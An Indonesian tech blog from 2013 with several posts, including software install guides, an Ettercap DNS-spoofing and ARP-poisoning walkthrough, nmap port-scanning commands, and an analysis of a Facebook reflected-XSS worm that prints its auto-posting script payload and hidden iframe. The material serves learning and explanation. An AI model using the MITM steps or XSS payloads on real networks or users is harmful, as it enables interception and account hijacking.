22 December 2013

Download Software DEVC++ 5.4.0 Free + Beserta Cara Instalnya !

Download Software DEV C++ 5.4.0 FREE , Gratis, Cara Instalasinya Software DEV C++ ,
Kali ini saya akan share artikel tentang Software beserta tutorialnya yang bernama Software DEV C++ 5.4.0, Softwarenya gratis kog (FREE) ,nanti juga saya akan post juga Cara Instalasinya :) oke langsung aja yah kita simak artikel ini :) 

Pertama kita Download dulu software DEVC++ di bawah ini :


Cara Instalasi kompiler DevC++  


Sebelum kita menggunakan Dev-C++ untuk kompilasi suatu program C atau C++, kita terlebih dahulu menginstall Dev-C++ pada komputer. 
Instalasi kompiler DevC++ 

Jalankan program instalasi Dev-C++dengan mengklik dua kali program dengan ikon sebagai berikut: 


Kemudian akan muncul tampilan jendela seperti berikut:    


Ini hanya sebuah peringatan yang menyatakan bahwa sebaiknya tidak melakukan instalasi program Dev-C++ pada komputer yang sudah memiliki program Dev-C++. Sebaiknya program Dev-C++ yang ada diuninstal atau dihapus sebelum instalasi dilanjutkan. 

Jika hal ini tidak menjadi masalah, kemudian klik Ok. Akan dimunculkan pilihan untuk menentukan bahasa yang akan digunakan pada program Dev- C++.  

 

Kita memilih English, karena pilihan Bahasa Indonesia belum tersedia. Dilanjutkan dengan mengklik Ok. 
Kemudian akan ditampilkan, jendela persetujuan lisensi atau agreement, kita lanjutkan dengan mengklik “I agree”. 

Akan ditampilkan, Jendela pilihan untuk bagian apa yang akan diinstall.


 Kita memilih Full (atau semua bagian program) dan kita lanjutkan dengan klik tombol Next. Setelah itu akan ditampilkan kotak input lokasi direktori di mana program Dev-C++ akan ditempatkan. 

    

Setelah dipilih direktori lokasi program Dev-C++, klik tombol Install. Kemudian jendela proses installasi ditampilkan.  


Setelah itu, jendela pertanyaan “apakah program akan diinstall untuk semua user pada komputer ini?“ muncul. Kita pilih semua user dengan klik tombol yes. 


Kemudian instalasi akan selesai. 

 

Klik finish, program Dev-C++ akan dijalankan jika tanda centang pada [] Run Dev-C++ 5 beta tidak dihilangkan.

sekian software yang saya berikan beserta tutorial instalasinya :) semoga bermanfaat dan membantu . :)


Thanks to : 3ads26
VeRZaW#021 Download Software

Cara Membersihkan Virus dengan Software Adw Cleaner Free

 Virus Komputer
Hallo broo.. kali ini saya akan posting cara membersihkan virus dari Browser kita, banyak sekali macam-macam virus yang meneror Komputer kita dan terutama Browser kita , seperti Qvo6,Search.do,Delta, dll

Berikut screenshot Virus yg ada didalam Browsernya :


contoh virus dalam browser

virus browser

Yaitu Virus Yang Membuat Seperti Search Engine Dan Search Engine Ini Hanya Memunculkan Hasil Ads/Iklan Pada Pencarian Yang Kita Masukan Keywordsnya , Maka Dari Itu Kalau Lama Kelamaan Akan Menjadi Buruk

Dampak Dari Virus Dalam Browser Kita :
  • Virus Ini Dapat Merusak Dapat Merusak Default Browser Kita Dengan Sendirinya Seperti Internet Explorer , Google Chrome , Mozzila Firefox
  • Mengganti Dan Menampilkan Homepage Virus Pencarian
  • Menyebabkan Redirect/Pengalihan Web Kesitus Yang Salah , Mengalihkan Dan Membajak Search Engine
  • Menyimpan Data Data Akses Keweb Web Situs Yang Pernah Anda Kunjungi Dan Hal Hal Penting Lainnya
  • Mengumpulkan Informasi Pribadi Anda Disitus Keuangan Seperti Bank Internet Dan Sebagainya , Dan Mengambil User Login Dan Password Anda Dan Di Akses Untuk Diambil Uang Anda
  • Virus Ini Bisa Menginfeksi Yang Mengarahkan Anda Kesitus Terinfeksi ( Malware Site )
  • Membuat Browser Anda Lebih Lambat Dari Biasanya

Cara Mengatasi Virus Didalam Browser Kita :

1. Download Software Adw Cleaner Versi Terbaru Free : [ Download ]

2. Download Softwarenya Sampai Selesai
3. Install Software Adw Cleanernya
4. Penampakan Software Adw Cleaner


5. Tekan " SCAN " Untuk Memindai Seluruh Sistem Komputer Dan Browser Anda Sampai Kesudut Sudut Terpencil Sekalipun



6. Tunggu Sampai Proses Scanningnya Selesai , Dan Lihatlah Screenshot Dibawah Sekarang Softwarenya Telah Men-Scanning Browser Anda



7. Setelah Itu Softwarenya Akan Menunda/Pending Untuk Menunggu Perintah Anda Mana Yang Harus Dibersihkan , Kalau Sudah Dipilih Klik " CLEAN " Untuk Membersihkan Virus Dalam Browser Anda


8. Tunggu Semua Proses Pembersihan Virus Dibrowser Anda




9. Setelah Semua Berjalanan Dengan Baik Maka Software AdwCleaner Akan Meminta Anda Me-Restart/Reboot Komputer Atau Laptop Anda Supaya Dampak Dari Virus Yang Sudah Dibersihkan Untuk Anda Sudah Hilang



10. Setelah Komputer Atau Laptop Anda Sudah Direstart Atau Reboot Maka Akan Keluar Text Di Notepad Secara Otomatis Untuk Melaporkan Virus Yang Sudah Dibersihkan Oleh AdwCleaner


Selamat .. Browser anda sekarang aman dan tidak ada virus apapun yang ada didalam browser, Keamanan sekarang sudah ditangan anda lagi, Tidak ada penggangu anda lagi, dan sekrang anda bisa bebas bersurfing di internet secara aman .. sekian tutorial dan software yang saya berikan , semoga bermanfaat dan membantu ya bro . :)
21 December 2013

Cara melakukan DNS Spoofing menggunakan aplikasi Ettercap


DNS Spoofing adalah salah satu metode hacking Man In The Middle Attack (MITM). Hampir sama konsepnya dengan ARP Spoofing, tapi yang membedakan adalah Attacker akan memalsukan alamat IP dari sebuah domain.

DNS adalah Domain Name Server, yaitu server yang digunakan untuk mengetahui IP Address suatu host lewat host name-nya. Dalam dunia internet, komputer berkomunikasi satu sama lain dengan mengenali IP Address-nya. Namun bagi manusia tidak mungkin menghafalkan IP address tersebut, manusia lebih mudah menghapalkan kata-kata seperti www.yahoo.com, www.google.com, atau www.facebook.com. DNS berfungsi untuk mengkonversi nama yang bisa terbaca oleh manusia ke dalam IP addresshost yang bersangkutan untuk dihubungi.

Jadi ketika target melakukan request terhadap sebuah alamat domain dengan alamat IP A, dengan DNS Spoofing, oleh gateway request user tersebut akan di forward ke alamat IP palsu dari attacker.

Oke, saatnya kita kita mencoba melakukan DNS Spoofing dengan menggunakan aplikasi Ettercap.

Sebelum berlanjut pada praktek metode DNS Spoofing, Anda perlu memperhatikan data berikut agar teman-teman tidak bingung saat mengikuti artikel saya selanjutnya.


KomputerIP AddressMAC Address
Gateway192.168.137.108:00:27:00:C0:1B
Target192.168.137.808:00:27:21:6C:6F
Attacker192.168.137.23808:00:27:77:B5:07

1. Modifikasi file konfigurasi DNS Spoofing

Ketikkan perintah berikut di terminal:
root@bt:~# nano /usr/local/share/ettercap/etter.dns

Sebagai contoh kita akan memalsukan alamat IP server dari domain microsoft.com. Geser scrool terminal Anda ke bawah hingga menemukan konfigurasi domain dari microsoft.com. Ubah alamat IP domain tersebut menjadi alamat mesin attacker Anda. Kemudian simpan konfigurasi tersebut dengan menekan tombol "Ctrl + O"




2. Jalankan service apache
Ketikkan sintaks berikut pada konsol terminal:
root@bt:~# apache2ctl start
Lakukan percobaan dengan membuka aplikasi browser internet Anda dan ketikkan alamat IP komputer attacker pada browser. Pastikan service apache di komputer attacker telah berjalan.


3. Jalankan apliasi Ettercap

Dengan mengetikkan perintah berikut di terminal BackTrack Anda:
root@bt:~# ettercap -G

maka akan muncul aplikasi Ettercap seperti gambar di bawah ini,



4. Pilih interface LAN Card yang akan digunakan untuk melakukan DNS Spoofing pada komputer Attacker

Pada aplikasi Ettercap, pilih menu Sniff -> Unified Sniffing , lalu akan muncul kotak dialog se

perti gambar di bawah. Karena saya menghunaka interface eth0, maka klik tombol Ok.



5. Scan host komputer target, gateway, dan komputer attacker

Yaitu dengan memilih menu Host -> Scan for host, maka Ettercap akan melakukan scanning komputer mana saja yang aktif mulai dari IP 192.168.137.0 sampai 192.168.137.255. Berhubung dalam jaringan virtual saya ada 3 buah komputer, maka ettercap akan mendeteksi 3 buah komputer yang aktif, seperti gambar di bawah ini.



6. Buka daftar hasil scan host
Pilih menu Hosts -> Hosts List , maka akan tampilan seperti berikut



7. Pilih Target yang akan dilakukan DNS Spoofing
Seperti telah diketahui sebelumnya bahwa komputer gateway memiliki IP 192.168.137.1, klik sekali pada IP komputer gateway dari daftar list hosts hasil scan sebelumnya, kemudian klik tombol "Add to Target 1".

Lakukan cara yang sama untuk komputer target dengan IP 192.168.137.8 dan klik tombol "Add to Target 2"



8. Pilih DNS Spoofing Plugins

pada menu aplikasi Ettercap, Plugins -> Manage Plugins -> DNS Spoof (klik 2 kali, sehingga muncul report 'DNS Spoofing Activating dns_spoof plugin...')




9. Lakukan proses ARP Spoofing
yaitu dengan memilih menu Mitm -> ARP poisoning , sehingga akan muncul kotak dialog seperti gambar di bawah, kemudian centang pilihan "Sniff remote connections", lalu klik tombol Ok. Maka aplikasi ettercap akan melakukan ARP Spoofing pada komputer target.






10. Start Sniffing
pilih menu Start -> Start Sniffing

Coba ketikkan alamat www.microsoft.com di browser komputer target, dan lihat apayang terjadi, tadaaaa....


coba lakukan ping ke www.microsoft.com dari komputer target:
dan coba lihat tampilan aplikasi ettercap di komputer attacker:




Lagi-lagi cuma sekedar tambahan, pada saat melakukan DNS Spoofing, jangan lupa selalu set nilai Ip_forwarding menjadi 1 dengan cara mengetikkan sintaks berikut pada terminal:
root@bt:~# echo 1 > /proc/sys/net/ipv4/ip_forward
Sekian tutorial yang saya share semoga bermanfaat bagi sobat semua, terus belajar trimakasih belajarbacktrack atas artikelnya Selamat Mencoba... :)
VeRZaW#021 Linux BackTrack

Pengertian Port Scanning & Perintahnya


Port Scanning adalah aktivitas yang dilakukan untuk memeriksa status port TCP dan UDP pada sebuah mesin. Banyak aplikasi yang menawarkan fasilitas untuk melakukan pemeriksaan port pada sebuah mesin, seperti netcat, unicornscan, nmap, dll. Nah untuk bahasan kali ini adalah kita akan menggunakan aplikasi nmap.

Banyak yang dapat kita lakukan dengan aplikasi nmap, mulai dari melakukan pemeriksaan port hingga mengidentifikasi sistem operasi yang digunakan oleh server target.

Jika teman-teman coba browse lewat Google, pasti akan manemukan berbagai macam variasi teknik dalam port scanning menggunakan aplikasi nmap. Berikut beberapa contoh teknik yang dapat digunakan menggunakan nmap.



1. Memeriksa port yang terbuka
nmap <host/IP target>
Sebagai catatan, apabila kita menjalankan query nmap di atas dengan user root,

maka sama saja kita menjalankan nmap dalam mode stealth silent (-sS)

2. Memeriksa spesifik port pada mesin target
nmap -p <host/IP target>
3. Memeriksa service yang berjalan pada port
nmap -sV <host/IP target>
4. Memeriksa port mesin target dalam 1 segmen jaringan
nmap <host/IP target>
Contoh jaringan dengan segmen 172.16.200.0/24:
nmap 172.16.200.*

5. Mengidentifikasi sistem operasi mesin
nmap -O <host/IP target>
Contoh setelah kita melakukan nmap adalah sebagai berikut:
root@bt:~# nmap -p 1-65535 -sV -O 172.16.200.20

Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2011-10-14 14:07 WIT
Nmap scan report for 172.16.200.20
Host is up (0.00052s latency).
Not shown: 65521 closed ports
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds?
1025/tcp  open  msrpc         Microsoft Windows RPC
1026/tcp  open  msrpc         Microsoft Windows RPC
1029/tcp  open  msrpc         Microsoft Windows RPC
1031/tcp  open  msrpc         Microsoft Windows RPC
1032/tcp  open  msrpc         Microsoft Windows RPC
1033/tcp  open  msrpc         Microsoft Windows RPC
1091/tcp  open  ff-sm?
2869/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp  open  ms-term-serv?
5357/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
64141/tcp open  tcpwrapped
MAC Address: 70:71:BC:EC:EC:51 (Pegatron)
Device type: general purpose
Running: Microsoft Windows Vista|2008|7
OS details: Microsoft Windows Vista SP0 - SP2, Windows Server 2008, or Windows 7 Ultimate
Network Distance: 1 hop
Service Info: OS: Windows

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.29 seconds
root@bt:~# 
    Dari hasil scanning di atas kita dapat mengetahui port-port yang terbuka dan mengetahui bahwa OS yang digunakan adalah Windows Vista 7. Dengan mengetahui port-port yang terbuka serta OS mesin target, kita dapat menentukan jenis-jenis serangan yang dapat dilakukan terhadap host target.

Sebagai security administrator yang handal tentunya tidak akan serta merta memberikan informasi secara gratis kepada user, itu sama saja Anda memancing sistem Anda untuk ditembus oleh hacker/cracker. Sehingga mungkin ada beberapa di antara teman2 yang akan mengalami kesusahan saat mengidentifikasi OS dari mesin target karena telah diprotect oleh Admin.

Tapi mungkin memang benar kata pepeatah, tidak ada sesuatu yang tidak mungkin. Tidak ada security system yang benar-benar aman. Lain kali kita akan berbagai metode-metode yang dapat digunakan untuk mengidentifikasi OS sebuah mesin target dengan bantuan aplikasi nmap :) sekian info yang bisa saya share trimakasih untuk belajarbacktrack sampai bertemu kembali sobat :)

VeRZaW#021 Linux BackTrack
19 December 2013

Cara Menampilkan Deep Freeze yang Tersembunyi

Deep Freeze adalah sebuah program aplikasi yang bersifat menjaga keamanan setting komputer anda dari tangan-tangan jahil yang tidak dikehendaki atau pun virus yang bermaksud merubah isi sistem komputer anda.
Namun hari ini saya mengalami kejadian aneh dimana icon deep freeze tersebut tidak tampil pada sudut kanan bawah taskbar, dan pengaktifan dengan tombol SHIFT+CTRL+ALT+F6 pun tidak dapat dilakukan, sedangkan saya memiliki program yang harus di install atau dipasang ke dalam komputer. (pada beberapa pengalaman yang lalu saya dengan tanpa ampun segera melakukan install ulang komputer… ya melelahkan memang, capek dech !!)
Dengan perasaan marah dan cemas mulai lah saya mengotak-atik program, klik sana, klik sini, eeh, kagak berhasil. dan akhirnya dengan membawa beberapa sajen saya pun segera bertanya dengan mbah google.co.id, mbah tolong saya untuk mengatasi permasalah ini. Dan dengan tersenyum manis mbah google pun langsung menjawab,
Cucukoe yang ganteng, gini caranya:
(1) klik tombol start, kemudian pilih sub menu Run.
(2) ketikkan perintah msconfig kemudian tekan tombol enter.
(3) pada jendela System Configuration Utility pilih tab startup.
(4) kemudian klik tombol Disable All, kemudian klik tombol OK
(5) secara otomatis program akan menampilkan System Configuration, klik tombol Exit Without Restart.
(6) selanjutnya klik tombol START pada taskbar komputer cucu, dan klik sub menu Log Off (log off komputer cucu)
(7) jika belum tampil juga, restart komputer, maka mudah2an tuh icon akan nampil lagi….saya pun mencobanya dan BERHASILLL… :) 
Tambahan : Kalau masih gagal juga coba di nonaktifkan dulu antivirus anda seperti SMADAV (disabled / non aktifkan) atau sejenisnya kemudian cobalah untuk LOG OFF komputer anda / restart kembali. 
Sekian tutor yang saya berikan semoga bermanfaat .. :)
VeRZaW#021 Komputer

Cara Mempercepat Proses Index Blog dengan input Sitemap ke Webmaster

Cara Memasang SiteMap di Google Untuk Mempercepat Index
SiteMap yang dimaksud disini bukan halaman tentang seluruh isi judul artikel blog yang dirangkum dalam satu Postingan, tapi Sitemap atau peta situs yang nanti akan di pasang di Google Webmaster. Ini dilakukan untuk mempercepat proses Index robot google pada artikel kita, tanpa melewatkan satu artikel pun.

Anda harus wajip melakukan ini supaya artikel anda cepat muncul di mesin pencari, dan Untuk membuat dan memasang Site map yang harus anda lakukan adalah ;

1. Masuk ke Webmaster Google, dan pastikan blog anda sudah terdaftar di webmaster
2. Pada halaman awal, klik url blog anda yang terdaftar di webmaster
3. Kemudian pilih Perayapan > Peta Situs > Tambahkan/Uji Peta situs (Submit Sitemap)




4. Pada kolom sitemap isi dengan feed atom.xml dibawah ini :

atom.xml?redirect=false&amp;start-index=1&amp;max-results=500

Jika artikel anda sudah melebihi 500, ganti dengan 1000.

5. Jika sudah klik Mengirim peta situs

Setelah anda selesai mensubmit sitemap akan ada pemberitahuan bawha sitemap anda telah terkirim, setelah itu anda hanya tinggal menunggu proses index kurang lebih satu hari. untuk lebih detailnya klik Check untuk melihat hasil Uji peta situs anda.

Penting nya cara ini adalah untuk lebih memaksimalkan pengindex di Google, supaya artikel kita cepat muncul di mesin pencari tanpa harus menunggu lama. Semoga bermanfaat sobat..
VeRZaW#021 Tutorial Blogger
17 December 2013

Teknik Penyebaran Status Berantai di Facebook !

Hari ini saya menyadari ada yang tidak beres dengan status teman-teman facebook saya. Banyak yang mendadak statusnya berisi promosi suatu link bahkan hingga berkali-kali. Apa gerangan yang terjadi? Dalam artikel ini saya akan membedah teknik penyebaran status berantai tersebut.

Analisa
Mari kita mulai analisa kita dengan mengambil sample satu URL jebakan, yaitu tinyurl.com/sampahh. Ini adalah url versi pendek yang bila diklik akan melakukan redirect ke url aslinya, yaitu:
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang :D http://tinyurl.com/sampahh';document.forms[0].submit();}</script>
URL tersebut akan saya pecah menjadi 3 bagian:
  • http://m.facebook.com/connect/prompt_feed.php
  • ?display=wap&user_message_prompt=
  • '<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang :D http://tinyurl.com/sampahh';document.forms[0].submit();}</script>
Bagian pertama adalah URL untuk update status. Bagian kedua adalah query string parameter yang terdiri dari dua parameter, yaitu display dan user_message_prompt. Bagian ketiga adalah isi dari parameter user_message_prompt yang merupakan payload javascript untuk mengubah status secara otomatis.
The Prompt
Sebelum masuk lebih jauh membahas payloadnya, mari kita lihat dulu bentuk tampilan dari URL untuk mengubah status ini. Gambar ini adalah screenshot ketika browser membuka URL:
http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt=Masukkan Status
Dari gambar di atas kini kita memahami fungsi dari parameter user_message_prompt, yaitu sebagai judul pertanyaan/prompt. Agar user mengerti apa yang harus diinputkan, dalam setiap prompt harus diberi judul yang jelas, contohnya: “Input your PIN”, “Enter your Name”, “Password:” dan sebagainya. Silakan anda mencoba bermain-main dengan mengubah-ubah nilai user_message_prompt sesuka anda di address bar dan perhatikan apa yang terjadi.
Reflected Cross Site Scripting
Normalnya user_message_prompt diisi dengan murni teks saja berupa instruksi/petunjuk apa yang harus diinputkan user. Bila parameter user_message_prompt berisi teks murni saja, maka tidak ada yang perlu dikhawatirkan, namun bagaimana bila parameter tersebut diisi dengan kode HTML atau javascript?
Perhatikan apa yang terjadi bila user_message_prompt diisi dengan kode HTML:
<font color=red><h1>Hello!!</h1></font>
Perhatikan juga apa yang terjadi bila user_message_prompt diisi dengan kode HTML:
<img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3ytha1cdpD2cWQVxDNhKXIZrtToBK1P1fPH80eL0pr0-M49SslY-FlSNBL35-Olrj2FyF31nRS5Rh4CUmR6l4Gq5tCqAzHA9Xoc2zeaFcLb7j3ZNIaHVRsq2B3UHLqdSq4uRmQd_sQa8/s320/Hacked.jpg"/>
Bagaimana bila user_message_prompt tidak hanya diisi dengan kode HTML, tapi diisi dengan kode javascript? Mari kita coba memasukkan javascript sederhana berikut ini:
<script>prompt("Enter your PIN");</script>
Kita sudah melihat bagaimana user_message_prompt tidak hanya bisa diisi dengan normal teks, namun juga bisa diisi dengan kode HTML dan javascript yang dieksekusi browser. Ini adalah vulnerability yang disebut dengan XSS (Cross Site Scripting), lebih tepatnya reflected-XSS (karena kode yang diinjeksikan dalam URL “dipantulkan” kembali sebagai response HTTP).
The Payload
Dalam contoh sebelumnya kita mencoba memasukkan javascript sederhana yang hanya menampilkan prompt input kepada user. Sebenarnya javascript bisa dipakai untuk melakukan hampir apa saja mulai dari yang sekedar iseng seperti mengubah status, sampai yang serius seperti seperti mencuri cookie korban atau take-over komputer korban dengan mengeksploitasi kelemahan pada browsernya. Hal-hal inilah yang disebut dengan payload. Attacker bebas memasukkan payload apa saja yang dia inginkan seperti mengubah status, mencuri cookie dsb.
Perhatikan kembali isi parameter user_message_prompt yang didapat dari tinyurl.com/sampahh:
user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='jangan salahin w kalo lo bakal ngakak ngeliat ni orang :D http://tinyurl.com/sampahh';document.forms[0].submit();}</script>
Bagi pembaca yang jeli tentu merasa aneh, kenapa ada karakter single-quote (‘) sebelum tag script? Perlukah karakter single-quote ini? Jawabannya adalah tidak perlu sama sekali. Saya melihat semua yang membuat url sejenis ini dalam payloadnya selalu ada karakter single-quote di depan tag script. Mungkin pembuatnya hanya ikut-ikutan saja tanpa benar-benar mengerti apa yang terjadi, karena dia mencontoh orang lain memakai single-quote, maka diapun ikut memakai single-quote.
Payload untuk mengubah status sebenarnya sangat sederhana. Berikut ini adalah payload untuk mengubah status di facebook secara otomatis:

Onload adalah event yang terjadi bila suatu halaman web selesai di-load. Baris pertama pada kode di atas artinya meminta browser untuk mengeksekusi sebuah fungsi secara otomatis ketika halaman ini selesai diload. Fungsi yang dimaksud terdiri dari dua baris kode sederhana untuk mengubah nilai textarea message dan melakukan submit form.
Baris kedua dimaksudkan untuk mengubah nilai dari textarea bernama message seperti gambar di bawah ini.
Langkah terakhir adalah memanggil fungsi submit() untuk melakukan submit form. Jadi sangat sederhana cara untuk mengubah status secara otomatis, cukup dua langkah saja, mengisi message dengan isi status, lalu submit, status pun selesai diubah.
Varian Lain dengan IFRAME
Saya juga menemukan varian lain yang memakai iframe. Varian ini lebih berbahaya karena bisa disisipkan dalam web apapun dan bisa dengan mudah melakukan pengubahan status berulang kali. Salah satu teman facebook saya menjadi korban freesmsvoip.com sampai berkali-kali.
Kenapa bisa kena sampai berkali-kali? Mari kita lihat potongan awal source html dari www.freesmsvoip.com.
<iframe id="CrazyDaVinci" style="display:none;" src="http://m.facebook.com/connect/prompt_feed.php?display=wap&user_message_prompt='<script>window.onload=function(){document.forms[0].message.value='Kirim SMS Gratis Ke Semua Operator di www.freesmsvoip.com Wow.. cool guys! coba gihhh!!!';document.forms[0].submit();}</script>"></iframe>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>SMS Gratis Semua Operator - Kirim SMS Gratis Via Internet - SMS Gratis Online - Widget SMS Gratis</title>
<meta name="description" content="Kirim SMS gratis ke semua operator GSM, CDMA se-Indonesia tanpa bayar lewat internet" />
Perhatikan pada baris pertama ada tag iframe dengan src yang juga mengeksploitasi XSS vulnerability pada m.facebook.com/connect/prompt_feed.php. Tag iframe ini tidak hanya ada pada halaman depan saja, namun pada setiap halaman di web tersebut. Akibatnya bila pengunjung hanya melihat halaman depan saja, dia hanya kena satu kali, bila dia juga berkunjung ke halaman-halaman lain, maka dia akan melakukan update status berkali-kali.
Berbeda dengan kasus yang memakai jasa pemendek url seperti tinyurl.com, serangan memakai iframe bisa dilekatkan pada halaman web yang tampak normal, baik hati dan tidak sombong. Dengan maraknya kasus eksploitasi XSS dengan url-shortener, orang akan semakin curiga bila menerima link yang dipendekkan karena user tidak tahu url itu akan dibelokkan ke mana. Menerima url yang dipendekkan kini mirip dengan menerima paket yang tidak jelas apa isinya, buku atau bom. Namun berbeda kasusnya dengan url yang panjang, orang cenderung tidak curiga bila menerima url panjang, apalagi domainnya tampak seperti situs baik-baik.
VeRZaW#021 Internet